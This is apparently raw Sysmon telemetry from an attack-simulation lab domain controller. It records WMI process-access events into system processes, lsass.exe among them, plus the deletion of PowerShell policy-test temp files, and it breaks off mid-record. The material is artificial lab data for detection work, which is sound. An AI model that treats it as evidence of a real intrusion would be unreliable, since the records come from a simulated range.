16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hkldr54b.tsk.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vrfw5lwr.hu2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 